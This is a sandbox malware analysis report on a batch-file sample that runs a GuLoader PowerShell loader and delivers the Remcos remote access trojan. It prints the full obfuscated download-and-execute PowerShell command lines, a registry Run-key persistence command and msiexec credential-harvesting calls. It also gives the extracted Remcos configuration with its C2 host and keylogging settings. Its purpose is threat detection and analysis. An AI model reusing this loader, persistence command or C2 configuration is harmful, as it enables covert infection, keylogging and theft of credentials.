Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MARSS-FILTRY_ZW015010024.bat

Overview

General Information

Sample name:MARSS-FILTRY_ZW015010024.bat
Analysis ID:1534998
MD5:23d982d0c7540551e840392de11571ae
SHA1:8cae67ab610dab59bf722ef2c1db09038e5a712d
SHA256:e5ebe4d8925853fc1f233a5a6f7aa29fd8a7fa3a8ad27471c7d525a70f4461b6
Tags:batRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2276 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MARSS-FILTRY_ZW015010024.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3664 cmdline: powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dskHLegieVoldaSpild iljeBetwrU absPlod[ ata$KlisSPaatpPrevaFr dr nvieHeteb aassIntesMulieI terSpinnVejeeTemp]Tord= Nit$UdviKOm aoBak lSk noHys.nSpiniBactaJehul UnpvPersaPater.chwerealsSoc, ');$Styklistens=Boendes ' ece$ Ou,URetanRenye Dicvme eaTarsn S eedispsGeldcIst eMadanTypet polIgn yLast. MasDHelaoSuprw umvnExoclTja o S.na RitdP,ykFHuf iPipelSwaneReg ( Nyf$UndsC ,ftaGodtf yctu .onsBackoCom,,Stri$ OraBHimmiDyregHavrePresm,rlsi ipnTykka Sp l ubl)Nonc ';$Bigeminal=$Tremmestolene;Aromastofs (Boendes 'Fl x$ TragSqualSpruO,sombDi.ea olalVaag: OdyFBlaslIndey HyrGGrsktSli.nsy.tiGlobnForbGItoie ommnDagnETrve= Exs(N ntTRetle asksTa sTSto -Spi,pFrysAI teTDiscHCirr U rk$CantbCho iInteGletveU,ilMKlveI ndNKentaUndeL Sta).ort ');while (!$Flygtningene) {Aromastofs (Boendes 'Tisk$WiwigSur l,ganoUnweb ffaaStaml Fok:SandMcockaQu nl EksiShaic mbai.egaoAb.ouEm rsD gsnNe,seFyris errs,yre1 Cal7Ch.s1 Non=Mach$SiamtE ferUndeu.ande .en ') ;Aromastofs $Styklistens;Aromastofs (Boendes ' UnlSRopeT P laMaryrAfklTRita-GeneSAfislBadeeOrchE merPVefr .eie4Inex ');Aromastofs (Boendes 'Frsk$Ma tgIntelIse,orideBRe mASma l.iau:MetrfProbLTab.YBonigImplTarbeNAftvi nuqnUndogR.une OvenTestEDruk=s.ns(teartMotoe Af SRa bT lac-UnwapErwiA SubT ishBrne Hund$Kl nBa ipIUntuGtideEAf.vM ,elIB.mbNRetrAbabyLGear)inso ') ;Aromastofs (Boendes 'Slug$ SjagGrahLDdsfORe.obBe.iAPrefLRdst:V,ntMTri iFlagKivieRVi eoFrikpEngeRSeleOUnfuC SpieForbs ChesKu.loPerfRSu rE EpirPharNQuiteEjec=tusk$P ntGsik.l omio GodbDiaga BralUnr :VesptTr kiPacec irecC,amhPiraEcrafNGalo+lic,+Nonv%Disu$VentpDowlOSyritLixiA tesFe iSBredIrivefBr.beTrolrmgleOGi.tuOpvas Blu.Roe cChemO kn,uBowlNRi sT fly ') ;$Cafuso=$Potassiferous[$Mikroprocessorerne];}$holding=324537;$Sevrdigheders=29555;Aromastofs (Boendes ' S y$ InsGrab lMegao web Na,aOuttlFort:KonsOZoopVKilueAlber ThigKnivUVi gnHe p Reva=St,k rregDo.nEHegntPlan-Pra,cLoddononsNBedetEftee RannDip,T For Kloa$ RugbUro iEgneGI,dreordem BesiFi,dnSuppaUns l ucr ');Aromastofs (Boendes 'Sick$,rndgDunklMah o SurbStrmaGattl ske:OrthBPrydaNor,kFi.at m ceMikrrMaltiEve,eUrtikHet,u Vaml OvetSensuEv lr VicsUrli Milj=Coun Disk[ArabSCoacy QuisShogta ine H,vmStri.Po.tCfordo ossnSpo vIc sety.irApokt ine] oi: avo:.sehFSprorVirkoPud mDup,BSeksaDians A oeBefa6P od4RecoSHe,etVi.irU dei B pnBihegUnsa(Ting$BoroOSki,v Ar.eLongrV ctgPe.ruRektn Vik).nse ');Aromastofs (Boendes 'Form$Sa ag,tomLDrifo SatBArgua aniL ost: ladtacloRPol.aTavsNL pps FoleC.taN Apon aboa eug Unse=Skat U dl[KaffsLumiYFjorsp.ast,olmeuplim ns.PtomtDet EJes X B.kTBill.OmarEObsenNodoC oruoMa kDSelvI SkrNP.osgFrot]Vejk: Min:St.fAGemmsFordCNeglIDopiiKr.e.Bar gcomie ljlTKo mSTermtCoxrRMagyIEnc nAnsog Emp(Skat$tronbOpbyA HonkrebntMaaleSelvRbevaIVierE ubkCh.nuT gelSepeTP.rtuUdmerGemeskolo) Sik ');Aromastofs (Boendes ' D m$ByggGSeculTranO tanBLrreAS.orL Sca:LagenOverOHkliN voGS ara FiglpaedaPrelCDevet hai olicClos=Mais$stroT Ek R AthA Snon ProSDecoeDelinTenoNNgs aScab.Rapas ildUTh ubDrifsSireTServr jtsis btNBillGbeky(Anbe$ RephskabO VanLDekoD R pi T kn M lG,ebr,Brmm$Sto sGloreAfbivakt R AutdScuti,quiGVoldhS preEsprdPateePneurSkibsShin)Vaab ');Aromastofs $Nongalactic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6504 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dskHLegieVoldaSpild iljeBetwrU absPlod[ ata$KlisSPaatpPrevaFr dr nvieHeteb aassIntesMulieI terSpinnVejeeTemp]Tord= Nit$UdviKOm aoBak lSk noHys.nSpiniBactaJehul UnpvPersaPater.chwerealsSoc, ');$Styklistens=Boendes ' ece$ Ou,URetanRenye Dicvme eaTarsn S eedispsGeldcIst eMadanTypet polIgn yLast. MasDHelaoSuprw umvnExoclTja o S.na RitdP,ykFHuf iPipelSwaneReg ( Nyf$UndsC ,ftaGodtf yctu .onsBackoCom,,Stri$ OraBHimmiDyregHavrePresm,rlsi ipnTykka Sp l ubl)Nonc ';$Bigeminal=$Tremmestolene;Aromastofs (Boendes 'Fl x$ TragSqualSpruO,sombDi.ea olalVaag: OdyFBlaslIndey HyrGGrsktSli.nsy.tiGlobnForbGItoie ommnDagnETrve= Exs(N ntTRetle asksTa sTSto -Spi,pFrysAI teTDiscHCirr U rk$CantbCho iInteGletveU,ilMKlveI ndNKentaUndeL Sta).ort ');while (!$Flygtningene) {Aromastofs (Boendes 'Tisk$WiwigSur l,ganoUnweb ffaaStaml Fok:SandMcockaQu nl EksiShaic mbai.egaoAb.ouEm rsD gsnNe,seFyris errs,yre1 Cal7Ch.s1 Non=Mach$SiamtE ferUndeu.ande .en ') ;Aromastofs $Styklistens;Aromastofs (Boendes ' UnlSRopeT P laMaryrAfklTRita-GeneSAfislBadeeOrchE merPVefr .eie4Inex ');Aromastofs (Boendes 'Frsk$Ma tgIntelIse,orideBRe mASma l.iau:MetrfProbLTab.YBonigImplTarbeNAftvi nuqnUndogR.une OvenTestEDruk=s.ns(teartMotoe Af SRa bT lac-UnwapErwiA SubT ishBrne Hund$Kl nBa ipIUntuGtideEAf.vM ,elIB.mbNRetrAbabyLGear)inso ') ;Aromastofs (Boendes 'Slug$ SjagGrahLDdsfORe.obBe.iAPrefLRdst:V,ntMTri iFlagKivieRVi eoFrikpEngeRSeleOUnfuC SpieForbs ChesKu.loPerfRSu rE EpirPharNQuiteEjec=tusk$P ntGsik.l omio GodbDiaga BralUnr :VesptTr kiPacec irecC,amhPiraEcrafNGalo+lic,+Nonv%Disu$VentpDowlOSyritLixiA tesFe iSBredIrivefBr.beTrolrmgleOGi.tuOpvas Blu.Roe cChemO kn,uBowlNRi sT fly ') ;$Cafuso=$Potassiferous[$Mikroprocessorerne];}$holding=324537;$Sevrdigheders=29555;Aromastofs (Boendes ' S y$ InsGrab lMegao web Na,aOuttlFort:KonsOZoopVKilueAlber ThigKnivUVi gnHe p Reva=St,k rregDo.nEHegntPlan-Pra,cLoddononsNBedetEftee RannDip,T For Kloa$ RugbUro iEgneGI,dreordem BesiFi,dnSuppaUns l ucr ');Aromastofs (Boendes 'Sick$,rndgDunklMah o SurbStrmaGattl ske:OrthBPrydaNor,kFi.at m ceMikrrMaltiEve,eUrtikHet,u Vaml OvetSensuEv lr VicsUrli Milj=Coun Disk[ArabSCoacy QuisShogta ine H,vmStri.Po.tCfordo ossnSpo vIc sety.irApokt ine] oi: avo:.sehFSprorVirkoPud mDup,BSeksaDians A oeBefa6P od4RecoSHe,etVi.irU dei B pnBihegUnsa(Ting$BoroOSki,v Ar.eLongrV ctgPe.ruRektn Vik).nse ');Aromastofs (Boendes 'Form$Sa ag,tomLDrifo SatBArgua aniL ost: ladtacloRPol.aTavsNL pps FoleC.taN Apon aboa eug Unse=Skat U dl[KaffsLumiYFjorsp.ast,olmeuplim ns.PtomtDet EJes X B.kTBill.OmarEObsenNodoC oruoMa kDSelvI SkrNP.osgFrot]Vejk: Min:St.fAGemmsFordCNeglIDopiiKr.e.Bar gcomie ljlTKo mSTermtCoxrRMagyIEnc nAnsog Emp(Skat$tronbOpbyA HonkrebntMaaleSelvRbevaIVierE ubkCh.nuT gelSepeTP.rtuUdmerGemeskolo) Sik ');Aromastofs (Boendes ' D m$ByggGSeculTranO tanBLrreAS.orL Sca:LagenOverOHkliN voGS ara FiglpaedaPrelCDevet hai olicClos=Mais$stroT Ek R AthA Snon ProSDecoeDelinTenoNNgs aScab.Rapas ildUTh ubDrifsSireTServr jtsis btNBillGbeky(Anbe$ RephskabO VanLDekoD R pi T kn M lG,ebr,Brmm$Sto sGloreAfbivakt R AutdScuti,quiGVoldhS preEsprdPateePneurSkibsShin)Vaab ');Aromastofs $Nongalactic;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6764 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7088 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 5536 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 5704 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gptotbreetfzdjh" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3184 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qkzzuucgsbxenxwycgm" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3436 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3792 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "iniiivan.duckdns.org:53848:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-G9FJB6", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 12 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_3664.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_6504.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc400:$b2: ::FromBase64String(
                • 0xb472:$s1: -join
                • 0x4c1e:$s4: +=
                • 0x4ce0:$s4: +=
                • 0x8f07:$s4: +=
                • 0xb024:$s4: +=
                • 0xb30e:$s4: +=
                • 0xb454:$s4: +=
                • 0x15149:$s4: +=
                • 0x151c9:$s4: +=
                • 0x1528f:$s4: +=
                • 0x1530f:$s4: +=
                • 0x154e5:$s4: +=
                • 0x15569:$s4: +=
                • 0xbca5:$e4: Get-WmiObject
                • 0xbe94:$e4: Get-Process
                • 0xbeec:$e4: Start-Process
                • 0x15e00:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\humplers
                Sigma detected: Direct Autorun Keys Modification
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7088, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", ProcessId: 5536, ProcessName: reg.exe
                Sigma detected: Msiexec Initiated Connection
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.248.196.6, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6764, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49870
                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6764, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", ProcessId: 7088, ProcessName: cmd.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
